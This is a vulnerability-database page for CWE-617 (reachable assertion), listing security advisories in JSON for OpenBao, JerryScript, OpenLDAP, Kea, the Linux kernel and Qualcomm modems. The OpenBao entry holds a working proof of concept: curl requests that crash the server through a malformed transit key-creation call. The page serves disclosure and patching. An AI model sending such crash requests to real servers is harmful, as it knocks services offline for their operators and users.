CWE-617
AllowedReachable Assertion
Abstraction: Base · Status: Draft
The product contains an assert() or similar statement that can be triggered by an attacker, which leads to an application exit or other behavior that is more severe than necessary.
990 vulnerabilities reference this CWE, most recent first.
GHSA-8W8F-R2XV-4Q4J
Vulnerability from github – Published: 2026-06-19 21:42 – Updated: 2026-06-19 21:42On OpenBao 2.5.4 and 2.5.2(and likely earlier versions also), an authenticated caller with write access to transit/keys/* can crash the OpenBao server by issuing a single key-creation request that combines an asymmetric type (rsa-*, ecdsa-*, ed25519)
with derived: true. The server returns no HTTP response and the process terminates (exit code 2). This is a remote, low-complexity denial-of-service against the OpenBao server.
Mount the transit engine:
`curl -sS -X POST -H "X-Vault-Token: root" \
-d '{"type":"transit"}' \
http://127.0.0.1:8200/v1/sys/mounts/transit`
Trigger the crash:
`curl -sS -w '\nHTTP %{http_code}\n' -X POST \
-H "X-Vault-Token: root" \
-H "Content-Type: application/json" \
-d '{"type":"rsa-2048","derived":true,"exportable":true,"deletion_allowed":false}' \
http://127.0.0.1:8200/v1/transit/keys/some-key-name`
You can try with both JSON or HCL It will crash the entire cluster.
Observed: HTTP 000 curl: (52) Empty reply from server
$ docker ps -a --filter name=openbao
STATUS: Exited (2)
Root Cause (Hypothesis)
Key-derivation paths in the transit engine appear to assume a symmetric key shape (a derivable key context). When derived: true is supplied alongside an asymmetric type, the creation path likely panics on a missing derived-key field or
invalid type assertion rather than returning a structured validation error. Maintainers should confirm against the transit policy.go / key-creation path.
Suggested fix:
Validate the (type, derived) combination at the top of the create-key handler. Reject with a 400 if derived: true is set on any non-symmetric type (i.e. anything other than aes128-gcm96, aes256-gcm96, chacha20-poly1305,
xchacha20-poly1305). Do this before any code path that may panic on missing derived-key state.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/openbao/openbao"
},
"ranges": [
{
"events": [
{
"introduced": "0.1.0"
},
{
"last_affected": "2.5.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/openbao/openbao"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.0-20260617104123-db57c62602b2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-55776"
],
"database_specific": {
"cwe_ids": [
"CWE-617"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-19T21:42:09Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "On OpenBao 2.5.4 and 2.5.2(and likely earlier versions also), an authenticated caller with write access to `transit/keys/*` can crash the OpenBao server by issuing a single key-creation request that combines an asymmetric `type` (`rsa-*`, `ecdsa-*`, `ed25519`)\nwith `derived: true`. The server returns no HTTP response and the process terminates (exit code 2). This is a remote, low-complexity denial-of-service against the OpenBao server.\n\n\nMount the transit engine:\n\n `curl -sS -X POST -H \"X-Vault-Token: root\" \\\n -d \u0027{\"type\":\"transit\"}\u0027 \\\n http://127.0.0.1:8200/v1/sys/mounts/transit`\n\nTrigger the crash:\n\n `curl -sS -w \u0027\\nHTTP %{http_code}\\n\u0027 -X POST \\\n -H \"X-Vault-Token: root\" \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"type\":\"rsa-2048\",\"derived\":true,\"exportable\":true,\"deletion_allowed\":false}\u0027 \\\n http://127.0.0.1:8200/v1/transit/keys/some-key-name`\n\nYou can try with both JSON or HCL It will crash the entire cluster.\n\n Observed:\n HTTP 000\n curl: (52) Empty reply from server\n\n $ docker ps -a --filter name=openbao\n STATUS: Exited (2)\n\nRoot Cause (Hypothesis)\nKey-derivation paths in the transit engine appear to assume a symmetric key shape (a derivable key context). When `derived: true` is supplied alongside an asymmetric `type`, the creation path likely panics on a missing derived-key field or\n invalid type assertion rather than returning a structured validation error. Maintainers should confirm against the transit `policy.go` / key-creation path.\n\nSuggested fix:\nValidate the (`type`, `derived`) combination at the top of the create-key handler. Reject with a 400 if `derived: true` is set on any non-symmetric type (i.e. anything other than aes128-gcm96, aes256-gcm96, chacha20-poly1305,\nxchacha20-poly1305). Do this before any code path that may panic on missing derived-key state.",
"id": "GHSA-8w8f-r2xv-4q4j",
"modified": "2026-06-19T21:42:09Z",
"published": "2026-06-19T21:42:09Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openbao/openbao/security/advisories/GHSA-8w8f-r2xv-4q4j"
},
{
"type": "WEB",
"url": "https://github.com/openbao/openbao/pull/3309"
},
{
"type": "WEB",
"url": "https://github.com/openbao/openbao/commit/db57c62602b25da12951f3f0edb888e7c4da61e5"
},
{
"type": "PACKAGE",
"url": "https://github.com/openbao/openbao"
},
{
"type": "WEB",
"url": "https://github.com/openbao/openbao/releases/tag/v2.5.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "OpenBao: Transit secrets engine crashes on key creation with `derived: true` for asymmetric key types"
}
GHSA-8WFR-XMH8-77X7
Vulnerability from github – Published: 2023-06-14 18:30 – Updated: 2024-04-04 04:50Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the parser_parse_for_statement_start at jerry-core/parser/js/js-parser-statm.c.
{
"affected": [],
"aliases": [
"CVE-2023-34868"
],
"database_specific": {
"cwe_ids": [
"CWE-617"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-06-14T16:15:20Z",
"severity": "HIGH"
},
"details": "Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the parser_parse_for_statement_start at jerry-core/parser/js/js-parser-statm.c.",
"id": "GHSA-8wfr-xmh8-77x7",
"modified": "2024-04-04T04:50:12Z",
"published": "2023-06-14T18:30:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34868"
},
{
"type": "WEB",
"url": "https://github.com/jerryscript-project/jerryscript/issues/5083"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-8WG3-GQCW-9FQ9
Vulnerability from github – Published: 2022-05-24 19:03 – Updated: 2022-05-24 19:03A flaw was found in OpenLDAP in versions before 2.4.56. This flaw allows an attacker who sends a malicious packet processed by OpenLDAP to force a failed assertion in csnNormalize23(). The highest threat from this vulnerability is to system availability.
{
"affected": [],
"aliases": [
"CVE-2020-25710"
],
"database_specific": {
"cwe_ids": [
"CWE-617"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-05-28T11:15:00Z",
"severity": "HIGH"
},
"details": "A flaw was found in OpenLDAP in versions before 2.4.56. This flaw allows an attacker who sends a malicious packet processed by OpenLDAP to force a failed assertion in csnNormalize23(). The highest threat from this vulnerability is to system availability.",
"id": "GHSA-8wg3-gqcw-9fq9",
"modified": "2022-05-24T19:03:39Z",
"published": "2022-05-24T19:03:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-25710"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1899678"
},
{
"type": "WEB",
"url": "https://git.openldap.org/openldap/openldap/-/commit/ab3915154e69920d480205b4bf5ccb2b391a0a1f#a2feb6ed0257c21c6672793ee2f94eaadc10c72c"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00008.html"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20210716-0003"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2020/dsa-4792"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-8XCR-6F99-HM7W
Vulnerability from github – Published: 2026-03-25 09:31 – Updated: 2026-06-30 03:36Sending a maliciously crafted message to the kea-ctrl-agent, kea-dhcp-ddns, kea-dhcp4, or kea-dhcp6 daemons over any configured API socket or HA listener can cause the receiving daemon to exit with a stack overflow error. This issue affects Kea versions 2.6.0 through 2.6.4 and 3.0.0 through 3.0.2.
{
"affected": [],
"aliases": [
"CVE-2026-3608"
],
"database_specific": {
"cwe_ids": [
"CWE-617"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-25T09:16:25Z",
"severity": "HIGH"
},
"details": "Sending a maliciously crafted message to the kea-ctrl-agent, kea-dhcp-ddns, kea-dhcp4, or kea-dhcp6 daemons over any configured API socket or HA listener can cause the receiving daemon to exit with a stack overflow error.\nThis issue affects Kea versions 2.6.0 through 2.6.4 and 3.0.0 through 3.0.2.",
"id": "GHSA-8xcr-6f99-hm7w",
"modified": "2026-06-30T03:36:00Z",
"published": "2026-03-25T09:31:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3608"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2026:11344"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2026:7342"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2026-3608"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451139"
},
{
"type": "WEB",
"url": "https://downloads.isc.org/isc/kea/2.6.5"
},
{
"type": "WEB",
"url": "https://downloads.isc.org/isc/kea/3.0.3"
},
{
"type": "WEB",
"url": "https://kb.isc.org/docs/cve-2026-3608"
},
{
"type": "WEB",
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-3608.json"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2026/03/25/6"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-8XJG-WJ8F-Q7JG
Vulnerability from github – Published: 2022-01-21 00:00 – Updated: 2022-01-27 00:02There is an Assertion 'cesu8_cursor_p == cesu8_end_p' failed at /jerry-core/lit/lit-strings.c in JerryScript 3.0.0.
{
"affected": [],
"aliases": [
"CVE-2021-46345"
],
"database_specific": {
"cwe_ids": [
"CWE-617"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-01-20T22:15:00Z",
"severity": "MODERATE"
},
"details": "There is an Assertion \u0027cesu8_cursor_p == cesu8_end_p\u0027 failed at /jerry-core/lit/lit-strings.c in JerryScript 3.0.0.",
"id": "GHSA-8xjg-wj8f-q7jg",
"modified": "2022-01-27T00:02:25Z",
"published": "2022-01-21T00:00:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-46345"
},
{
"type": "WEB",
"url": "https://github.com/jerryscript-project/jerryscript/issues/4920"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-93CV-5M73-Q9H8
Vulnerability from github – Published: 2024-05-21 18:31 – Updated: 2025-09-24 00:30In the Linux kernel, the following vulnerability has been resolved:
cpu/hotplug: Don't offline the last non-isolated CPU
If a system has isolated CPUs via the "isolcpus=" command line parameter, then an attempt to offline the last housekeeping CPU will result in a WARN_ON() when rebuilding the scheduler domains and a subsequent panic due to and unhandled empty CPU mas in partition_sched_domains_locked().
cpuset_hotplug_workfn() rebuild_sched_domains_locked() ndoms = generate_sched_domains(&doms, &attr); cpumask_and(doms[0], top_cpuset.effective_cpus, housekeeping_cpumask(HK_FLAG_DOMAIN));
Thus results in an empty CPU mask which triggers the warning and then the subsequent crash:
WARNING: CPU: 4 PID: 80 at kernel/sched/topology.c:2366 build_sched_domains+0x120c/0x1408 Call trace: build_sched_domains+0x120c/0x1408 partition_sched_domains_locked+0x234/0x880 rebuild_sched_domains_locked+0x37c/0x798 rebuild_sched_domains+0x30/0x58 cpuset_hotplug_workfn+0x2a8/0x930
Unable to handle kernel paging request at virtual address fffe80027ab37080 partition_sched_domains_locked+0x318/0x880 rebuild_sched_domains_locked+0x37c/0x798
Aside of the resulting crash, it does not make any sense to offline the last last housekeeping CPU.
Prevent this by masking out the non-housekeeping CPUs when selecting a target CPU for initiating the CPU unplug operation via the work queue.
{
"affected": [],
"aliases": [
"CVE-2023-52831"
],
"database_specific": {
"cwe_ids": [
"CWE-617"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-21T16:15:20Z",
"severity": "MODERATE"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\ncpu/hotplug: Don\u0027t offline the last non-isolated CPU\n\nIf a system has isolated CPUs via the \"isolcpus=\" command line parameter,\nthen an attempt to offline the last housekeeping CPU will result in a\nWARN_ON() when rebuilding the scheduler domains and a subsequent panic due\nto and unhandled empty CPU mas in partition_sched_domains_locked().\n\ncpuset_hotplug_workfn()\n rebuild_sched_domains_locked()\n ndoms = generate_sched_domains(\u0026doms, \u0026attr);\n cpumask_and(doms[0], top_cpuset.effective_cpus, housekeeping_cpumask(HK_FLAG_DOMAIN));\n\nThus results in an empty CPU mask which triggers the warning and then the\nsubsequent crash:\n\nWARNING: CPU: 4 PID: 80 at kernel/sched/topology.c:2366 build_sched_domains+0x120c/0x1408\nCall trace:\n build_sched_domains+0x120c/0x1408\n partition_sched_domains_locked+0x234/0x880\n rebuild_sched_domains_locked+0x37c/0x798\n rebuild_sched_domains+0x30/0x58\n cpuset_hotplug_workfn+0x2a8/0x930\n\nUnable to handle kernel paging request at virtual address fffe80027ab37080\n partition_sched_domains_locked+0x318/0x880\n rebuild_sched_domains_locked+0x37c/0x798\n\nAside of the resulting crash, it does not make any sense to offline the last\nlast housekeeping CPU.\n\nPrevent this by masking out the non-housekeeping CPUs when selecting a\ntarget CPU for initiating the CPU unplug operation via the work queue.",
"id": "GHSA-93cv-5m73-q9h8",
"modified": "2025-09-24T00:30:40Z",
"published": "2024-05-21T18:31:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52831"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/3073f6df783d9d75f7f69f73e16c7ef85d6cfb63"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/335a47ed71e332c82339d1aec0c7f6caccfcda13"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/3410b702354702b500bde10e3cc1f9db8731d908"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/38685e2a0476127db766f81b1c06019ddc4c9ffa"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-9446-54VC-3XW5
Vulnerability from github – Published: 2024-12-19 21:31 – Updated: 2025-05-28 15:33An assert may be triggered, causing a temporary denial of service when a peer device sends a specially crafted malformed L2CAP packet. If a watchdog timer is not enabled, a hard reset is required to recover the device.
{
"affected": [],
"aliases": [
"CVE-2024-7138"
],
"database_specific": {
"cwe_ids": [
"CWE-617"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-19T20:15:07Z",
"severity": "MODERATE"
},
"details": "An assert may be triggered, causing a temporary denial of service when a peer device sends a specially crafted malformed L2CAP packet. If a watchdog timer is not enabled, a hard reset is required to recover the device.",
"id": "GHSA-9446-54vc-3xw5",
"modified": "2025-05-28T15:33:57Z",
"published": "2024-12-19T21:31:11Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7138"
},
{
"type": "WEB",
"url": "https://community.silabs.com/068Vm00000F9zre"
},
{
"type": "WEB",
"url": "https://community.silabs.com/068Vm00000I5mjD"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-947J-97CH-3PWF
Vulnerability from github – Published: 2022-02-12 00:00 – Updated: 2023-04-19 18:31Possible assertion due to improper size validation while processing the DownlinkPreemption IE in an RRC Reconfiguration/RRC Setup message in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile
{
"affected": [],
"aliases": [
"CVE-2021-30326"
],
"database_specific": {
"cwe_ids": [
"CWE-617"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-02-11T11:15:00Z",
"severity": "HIGH"
},
"details": "Possible assertion due to improper size validation while processing the DownlinkPreemption IE in an RRC Reconfiguration/RRC Setup message in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile",
"id": "GHSA-947j-97ch-3pwf",
"modified": "2023-04-19T18:31:04Z",
"published": "2022-02-12T00:00:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-30326"
},
{
"type": "WEB",
"url": "https://www.qualcomm.com/company/product-security/bulletins/february-2022-bulletin"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-96G3-J574-G29C
Vulnerability from github – Published: 2023-10-03 06:30 – Updated: 2024-04-04 08:02Transient DOS in Modem while triggering a camping on an 5G cell.
{
"affected": [],
"aliases": [
"CVE-2023-24843"
],
"database_specific": {
"cwe_ids": [
"CWE-617"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-10-03T06:15:22Z",
"severity": "HIGH"
},
"details": "Transient DOS in Modem while triggering a camping on an 5G cell.",
"id": "GHSA-96g3-j574-g29c",
"modified": "2024-04-04T08:02:24Z",
"published": "2023-10-03T06:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-24843"
},
{
"type": "WEB",
"url": "https://www.qualcomm.com/company/product-security/bulletins/october-2023-bulletin"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-96MR-29C5-M9Q4
Vulnerability from github – Published: 2026-03-02 18:31 – Updated: 2026-03-02 18:31Transient DOS when an LTE RLC packet with invalid TB is received by UE.
{
"affected": [],
"aliases": [
"CVE-2025-47371"
],
"database_specific": {
"cwe_ids": [
"CWE-617"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-02T17:16:23Z",
"severity": "MODERATE"
},
"details": "Transient DOS when an LTE RLC packet with invalid TB is received by UE.",
"id": "GHSA-96mr-29c5-m9q4",
"modified": "2026-03-02T18:31:45Z",
"published": "2026-03-02T18:31:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47371"
},
{
"type": "WEB",
"url": "https://docs.qualcomm.com/product/publicresources/securitybulletin/march-2026-bulletin.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
Make sensitive open/close operation non reachable by directly user-controlled data (e.g. open/close resources)
Mitigation
Strategy: Input Validation
Perform input validation on user data.
No CAPEC attack patterns related to this CWE.